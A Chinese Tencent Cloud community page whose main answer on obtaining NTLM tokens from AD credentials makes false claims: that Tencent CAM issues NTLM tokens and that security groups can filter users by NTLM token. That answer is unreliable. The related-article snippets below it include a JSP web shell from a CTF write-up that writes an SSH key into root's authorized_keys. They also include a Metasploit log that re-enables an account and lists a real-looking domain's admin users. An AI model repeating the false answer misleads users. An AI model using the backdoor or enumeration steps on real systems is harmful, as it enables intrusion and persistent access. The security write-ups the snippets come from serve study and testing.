开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

从AD凭据获取NTLM令牌

是指在Windows操作系统中，通过使用Active Directory（AD）凭据来获取NT LAN Manager（NTLM）令牌的过程。NTLM是一种Windows操作系统中常用的身份验证协议，用于验证用户的身份并授予访问权限。

在这个过程中，用户首先提供其AD凭据，包括用户名和密码。然后，系统将这些凭据发送到AD服务器进行验证。如果凭据有效，AD服务器将返回一个NTLM令牌给用户。该令牌包含了用户的身份信息和授权信息。

NTLM令牌的获取在Windows操作系统中具有重要意义，它可以用于访问受保护的资源、执行特权操作以及进行其他需要身份验证的操作。通过使用NTLM令牌，系统可以确保只有经过身份验证的用户才能访问敏感数据和功能。

在云计算领域，从AD凭据获取NTLM令牌可以应用于各种场景，例如：

身份验证和访问控制：通过使用NTLM令牌，云服务提供商可以验证用户的身份，并根据其权限授予相应的访问权限。这有助于确保只有授权用户可以使用云服务。
安全性增强：NTLM令牌的使用可以提高云计算系统的安全性。通过使用令牌进行身份验证，可以防止未经授权的访问和数据泄露。
资源保护：通过使用NTLM令牌，云计算系统可以保护受保护的资源免受未经授权的访问。只有具有有效令牌的用户才能访问这些资源。

腾讯云提供了一系列与身份验证和访问控制相关的产品和服务，可以帮助用户实现从AD凭据获取NTLM令牌的功能。其中包括：

腾讯云身份与访问管理（CAM）：CAM是腾讯云提供的一种身份验证和访问控制服务，可以帮助用户管理和控制其云资源的访问权限。通过CAM，用户可以实现从AD凭据获取NTLM令牌的功能。
腾讯云安全组：安全组是腾讯云提供的一种网络访问控制功能，可以帮助用户保护其云资源免受未经授权的访问。通过配置安全组规则，用户可以限制只有具有有效NTLM令牌的用户才能访问其云资源。

更多关于腾讯云身份验证和访问控制相关产品和服务的详细信息，请参考腾讯云官方文档：腾讯云身份与访问管理（CAM）

请注意，以上答案仅供参考，具体的解决方案和推荐产品应根据实际需求进行评估和选择。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

以最复杂的方式绕过 UAC

让我们从系统如何防止您绕过最无意义的安全功能开始。默认情况下，如果用户是本地管理员，LSASS 将过滤任何网络身份验证令牌以删除管理员权限。但是有一个重要的例外，如果用户是域用户和本地管理员，则 LSASS 将允许网络身份验证使用完整的管理员令牌。如果说您使用Kerberos在本地进行身份验证，这将是一个问题。这不是微不足道的 UAC 绕过吗？只需以域用户身份向本地服务进行身份验证，您就会获得绕过过滤的网络令牌？

03

非官方Mimikatz指南和命令参考

Mimikatz是从Windows系统收集凭据数据的最佳工具之一.实际上,大多数认为Mimikatz是Windows凭据的"瑞士军刀"(或多功能工具),该工具可以完成所有任务.由于Mimikatz的作者Benjamin Delpy是法国人,因此,至少在他的博客上,大多数描述Mimikatz用法的资源都使用法语.该Mimikatz GitHub的库是英文的,包括命令使用的有用信息.

02

windows的认证方式

在本地登陆的情况下，操作系统会使用用户输入的密码作为凭据去与系统中的密码进行校验，如果成功的话表明验证通过。操作系统的密码存储在C盘的目录下：

04

Windows安全认证机制之NTLM本地认证

当我们在一台Windows机器上面创建用户的时候，该用户的密码会加密储存在一个SAM（Security Account Manager 安全账号管理器）中，是Windows操作系统管理用户帐户的安全所使用的一种机制，该文件存储路径如图1-1所示。

01

蜜罐账户的艺术：让不寻常的看起来正常

本文介绍如何创建用作蜜罐（或蜜令牌）的帐户，这些帐户看起来像是提供了攻击者想要的东西（访问），但最终提供了防御者想要的东西（检测）。重点是使蜜罐帐户在 Active Directory 中看起来正常且“真实”，并且此前提应该在某种程度上可以移植到其他系统。

01

干货 | 域渗透之域持久性：Shadow Credentials

https://www.dsinternals.com/wp-content/uploads/eu-19-Grafnetter-Exploiting-Windows-Hello-for-Business.pdf

03

内网渗透 - 哈希传递攻击

在内网渗透过程中，当获取到某个管理员用户的密码 hash 值却无法解密时，可以通过哈希传递攻击（Pass The Hash）对内网其他机器进行横向渗透。

06

PetitPotam – NTLM 中继到 AD CS

在企业环境中部署 Active Directory 证书服务 (AD CS) 可以允许系统管理员利用它在不同目录对象之间建立信任。但是，它可能允许红队操作员对 AD CS 的 Web 界面进行 NTLM 中继攻击，以破坏网络。Web 界面用于允许用户获取证书（Web 注册），通过 HTTP 协议，不支持签名并接受 NTLM 身份验证。

01

记一次MS14-058到域控实战记录

msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_account msf post(enable_support_account) > set password 7a57a5a743894a0e msf post(enable_support_account) > set session 2 msf post(enable_support_account) > exploit [*] Target OS is Windows .NET Server (Build 3790, Service Pack 2). [*] Harvesting users... [+] Found SUPPORT_388945a0 account! [*] Target RID is 1004 [*] Account is disabled, activating... [*] Swapping RIDs...! [*] Setting password to 7a57a5a743894a0e [*] Post module execution completed 用于远程桌面连接的3389端口被管理员修改过了，根据经验猜测3392应该是修改后的端口号，在远程连接界面看到存在域，说明这台机器在HOSTING域内。 Webshell执行域信息搜集相关命令时会提示：System error 5 has occurred . Access is denied . 。访问被拒绝，权限问题。 ipconfig /all //网卡配置信息，所属域以及IP段 ping backbox //显示该机器名的IP net view //显示当前域中的计算机列表 net view /domain //查看有多少个域 net user /domain //获取所有域用户列表 net group /domain //获取域用户组信息 net group "domain admins" /domain //获取当前域管理员 net time /domain //域服务器一般也做时间服务器 dsquery server //查看域控服务器 dsquery subnet //查看域IP地址范围因为meterpreter会话2里已经是SYSTEM权限了，所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息，缺图。 msf post(enable_support_account) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 13204 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain hosting.lunarpages.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- _new_win_user abbas.khan akumar alexb alext brianl dgreathouse dimitriosk epak gcager gudiyak iismon Jassi

02

Windows 身份验证中的凭据管理

Windows 凭据管理是操作系统从服务或用户接收凭据并保护该信息以供将来向身份验证目标呈现的过程。对于加入域的计算机，身份验证目标是域控制器。身份验证中使用的凭据是将用户身份与某种形式的真实性证明（例如证书、密码或 PIN）相关联的数字文档。

01

Kerberos基础入门

当Client想要访问Server上的某个服务时，需要先向AS证明自己的身份，然后通过AS发放的TGT向Server发起认证请求，这个过程分为三块：

03

内网渗透 | Kerberos 协议与 Kerberos 认证原理

如果你了解内网渗透，那么应该都对 IPC、黄金票据、白银票据、、PTT、PTK 这些老生常谈的词汇再熟悉不过了，对其利用也应该是了如指掌了吧。但是如果你对其背后的所使用的原理还不太了解的话，那么这篇（系列）文章你一定不能错过。

03

Windows认证及抓密码总结

windows的认证方式主要有NTLM认证、Kerberos认证两种。同时，Windows Access Token记录着某用户的SID、组ID、Session、及权限等信息，也起到了权限认证的作用。

04

哈希传递（Pass The Hash）攻击与利用

哈希传递（Pass The Hash）攻击，该方法通过找到与账户相关的密码散列值（通常是 NTLM Hash）来进行攻击。

03

Dumping LSASS With No Mimikatz

Mimikatz是渗透测试中常用的知名工具，它主要用于从Windows上的内存中转储凭据，作为渗透测试人员此方法对于Windows Active Directory环境中的横向和纵向权限提升非常宝贵，并且几乎用于所有内网渗透测试，由于其受欢迎程度，Mimikatz可执行文件和PowerShell脚本已被大多数防病毒(AV)解决方案检测到，这篇文章将介绍几种替代方法来实现相同的目标而无需修改Mimikatz来躲避AV的查杀，以及一些预防和检测这种攻击的方法

02

内网渗透 | 了解和防御Mimikatz抓取密码的原理

前不久在使用mimikatz抓取hash的时候遇到了报错，本着追根溯源的原则去查看了mimikatz抓取密码的原理。在学习的过程中发现了mimikatz的每种报错都有不同的原因，本文就记录一下自己的学习过程，从mimikatz的防御角度出发来分析如何防御mimikatz抓取密码。

01

内网渗透|Kerberos认证和黄金票据

Kerberos是一种计算机网络授权协议，用来在非安全网络中，对个人通信以安全的手段进行身份认证。

02

内网协议NTLM之内网大杀器CVE-2019-1040漏洞

Preempt的研究人员发现了如何在NTLM身份验证上绕过MIC(Message Integrity Code)保护措施并修改NTLM消息流中的任何字段（包括签名）。该种绕过方式允许攻击者将已经协商签名的身份验证尝试中继到另外一台服务器，同时完全删除签名要求。所有不执行签名的服务器都容易受到攻击。这个漏洞其实就是可以绕过NTLM MIC的防护，也是NTLM_RELAY漏洞。攻击者利用该漏洞可以绕过NTLM中的MIC（Message Integrity Code）。攻击者可以修改已经协商签名的身份验证流量，然后中继到另外一台服务器，同时完全删除签名要求。通过该攻击方式可使攻击者在仅有一个普通域账号的情况下，运程控制域中任意机器（包括域控服务器）。

03

smartbrute - AD域的密码喷射和暴力破解工具

此工具可用于暴力破解/喷洒 Active Directory 帐户凭据。支持以下攻击，每种攻击都有自己的好处：

03

Active Directory渗透测试典型案例（1）

我有几个客户在渗透测试之前来找我，说他们的系统安全做得非常好，因为他们的漏洞扫描显示没有严重的漏洞并且已准备好进行安全测试，这使我在15分钟内利用AD中的错误配置获得了域管理员权限。

03

WinRM的横向移动详解

横向的手法从简单的远程桌面协议（rdp）到漏洞利用，手法不断在改变，要对抗的设备产品也不断地变化，有个技术主管问我，红蓝的快乐在于什么？为什么我钟情在红蓝。我想中快乐就是来自于对抗吧。

01

NTLM协议详解

NTLM(New Technology LAN Manager)身份验证协议是微软用于Windows身份验证的主要协议之一。早期SMB协议以明文口令的形式在网络上传输，因此产生了安全性问题。后来出现了LM(LAN Manager)身份验证协议，它是如此的简单以至于很容易被破解。后来微软提出了NTLM身份验证协议，以及更新的NTLM V2版本。NTLM协议既可以为工作组中的机器提供身份验证，也可以用于域环境身份验证。NTLM协议可以为SMB、HTTP、LDAP、SMTP等上层微软应用提供身份认证。

05

我所了解的内网渗透 - 内网渗透知识大总结

一般想知道哪一台是域控知道自己内网的DNS就可以了，一般域控安装都有安装DNS有些不止一台，其次是通过扫描获取开放端口为389机器或者使用NLTEST命令查看。最后就是各种网络查看查看域控是哪台主机

05

域渗透技巧

由于每台服务器都需要注册用于Kerberos身份验证服务的SPN，因此这为在不进行大规模端口扫描的情况下收集有关内网域环境的信息提供了一个更加隐蔽的方法。

02

Active Directory 持久性技巧 1：目录服务还原模式 (DSRM)

每个域控制器都有一个用于 DC 的内部“Break glass”本地管理员帐户，称为目录服务还原模式 (DSRM) 帐户。提升 DC 时设置的 DSRM 密码，很少更改。在域控制器上更改 DSRM 密码的主要方法是运行 ntdsutil 命令行工具。

01

域渗透之NTML-Hash

早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制，简称LM，它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制，称之为NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令，我们称之为hash（中文：哈希），Windows的系统密码hash默认情况下一般由两部分组成：第一部分是LM-hash，第二部分是NTLM-hash。

05

Active Directory中获取域管理员权限的攻击方法

攻击者可以通过多种方式获得 Active Directory 中的域管理员权限。这篇文章旨在描述一些当前使用的比较流行的。此处描述的技术“假设破坏”，即攻击者已经在内部系统上站稳脚跟并获得了域用户凭据（也称为后利用）。

01

windows之NTLM认证

比如当用户输入密码admin的时候，操作系统会将admin转换为16进制，经过Unicode转换后，再调用MD4加密算法加密，这个加密结果的十六进制就是NTLM Hash

02

kerberos认证下的一些攻击手法

Kerberos黄金票据是有效的TGT Kerberos票据，因为它是由域Kerberos帐户（KRBTGT）加密和签名的。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

06

[干货基础]域渗透学习

Kerberos是一种由MIT提出的一种计算机网络授权协议，旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。域内访问其他应用应遵循服务Kerberos协议。完整的域内应用访问流程如图所示，首先由客户端向域控发起认证请求，域控验证用户是否属于合法域用户，若合法则由域控响应主机请求分发TGT认证票据(黄金票据可伪造TGT)，拿到证书后主机可以继续请求访问域内的应用服务，若权限符合域控会返回允许主机访问域内某应用服务的TGS票据，主机拿着TGS票据访问对应的应用服务，该应用服务器验证TGS通过后主机即可顺利访问应用服务

03

通过WebDav进行NTLM Relay

NTLM Relay大家已经不再陌生了，很多时候我们通过NTLM Relay进行攻击时，会受到协议签名(ldap/s、smb等协议签名)的影响从而导致攻击失败，并且随着时间的流逝，我们想要遇到忽略签名的smb等服务也变得越来越困难了，我们有哪些方法来忽略服务端验证签名的影响从而达到我们relay攻击的目的呢？

02

Netlogon(CVE-2020-1472)讲解及复现

2020年08月12日，Windows官方发布了 NetLogon 特权提升漏洞的风险通告，该漏洞编号为 CVE-2020-1472，漏洞等级：严重，漏洞评分：10分。

01

域信息收集自动脚本WinPwn

https://github.com/S3cur3Th1sSh1t/WinPwn#sessiongopher---executes-sessiongopher-asking-you-for-parameters

02

Windows密码凭证获取学习

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

02

横向移动与域控权限维持方法总汇

如果找到了某个用户的ntlm hash，就可以拿这个ntlm hash当作凭证进行远程登陆了其中若hash加密方式是 rc4 ，那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos协议均存在PTH: NTLM自然不用多说 kerberos协议也是基于用户的client hash开始一步步认证的，自然也会受PTH影响

02

凭据收集总结

本来按计划应该学习横向移动，但是发现一个问题，如何横向？这就是我记录这一章的目的，提升权限之后获取凭证，利用已获取的凭证扩大战果才是正确的姿势，学习的主要资料是参考链接中的分享，建议阅读参考的原文，再次说明，我的只是笔记，记录我的学习过程中的所思所想。

03

Windows安全认证机制之Kerberos 域认证

Kerberos是由麻省理工学院（MIT）开发的网络身份验证协议，它的主要好处是强大的加密和单点登录（SSO）。Kerberos作为一种可信任的第三方认证服务，是通过传统的密码技术（如共享密钥）实现不依赖于主机操作系统的认证，无需基于主机地址的信任，不要求网络上所有主机的物理安全，并假定网络上传送的数据包可以被任意地读取、修改和插入数据的情况下保证通讯安全。

01

域渗透基础（一）

工作组是局域网中的一个概念，由许多在同一物理地点，而且被相同的局域网连接起来的用户组成的小组，也可以是遍布一个机构的，但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式，就是将不同的电脑按功能分别列入不同的组中，加入工作组是为了区分用户计算机在网络中的类别，如果用户有工作组的话，在管理上会方便很多，可以共享/使用打印机和协和工作，很多小企业都是用这种方法来管理电脑，共享文件。

01

斗象红队日记 | 如何利用AD CS证书误配获取域控权限

在深入了解如何通过证书服务攻击获取域控权限之前，我们先进入草莓时刻，了解一下什么是AD CS。

01

渗透中的内网渗透

本节主要介绍当拿下一台机器后，应该做的一些信息收集，尽可能的收集密码，去尝试其他机器。

04

影响所有Windows版本远程桌面（RDP）应用的CredSSP漏洞分析

在3月13号的微软补丁日中，由Preempt团队发现的Windows凭据安全支持提供协议（CredSSP）高危漏洞CVE-2018-0886被修复，该漏洞为逻辑远程代码执行（RCE）漏洞，几乎所有版本

05

赏金猎人:IChunQiu云境-Spoofing Writeup

<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NCMzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaTR3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUlabDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("");%>

01

攻防|不太常见的Windows本地提权方法一览

链接：https://www.freebuf.com/defense/397357.html

01

LDAP 中继扫描

尝试在域控制器上中继 NTLM 身份验证 LDAP 时，有几个服务器端保护。此工具尝试枚举的 LDAP 保护包括：

01

从外网SiteServer前端漏洞getshell，到远程加载shellcode绕过杀软360全家桶杀入内网域控

windows 2016 web：192.168.2.29 - www.moonlab.com（外网）、10.10.1.131（内网）

02

window下抓取密码总结

无论是在我们渗透测试过程中(授权的情况下)还是在自己搭建的环境中进行攻防演练，获取服务器的明文密码或这hash值这一步骤非常重要，如果抓取到的密码是整个域内服务器的通用密码，那我们就可以不费吹灰之力拿到整个域控内的所有服务器。现在抓取密码的工具差不多都是exe、图形化工具、python写的工具等。

04

【内网安全】横向移动&Kerberos攻击&SPN扫描&WinRM&WinRS&RDP

IPC，WMI，SMB，PTH，PTK，PTT，SPN，WinRM，WinRS，RDP，Plink，DCOM，SSH；Exchange，LLMNR投毒，Kerberos_TGS，GPO&DACL，域控提权漏洞，约束委派，数据库攻防，系统补丁下发执行，EDR定向下发执行等。

01

Lil-Pwny：一款基于Python的多功能活动目录密码审计工具

Lil-Pwny是一款多功能活动目录密码审计工具，该工具基于Python编程语言实现，并且能够帮助广大研究人员通过多种处理方法来对活动目录密码进行安全审计。

01

内网协议NTLM之NTLM基础

我们知道windows系统自身是不会保存明文密码的，也就是说SAM中保存的不是明文而是Hash。在本地登陆的情况下，操作系统会使用用户输入的密码作为凭据去与系统中的密码进行校验，如果成功的话表明验证通过。操作系统的密码存储在C盘的目录下：

02

什么是内网渗透委派攻击？

域委派是指将域内用户的权限委派给服务账号，使得服务账号能以用户的权限在域内展开活动。

02

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭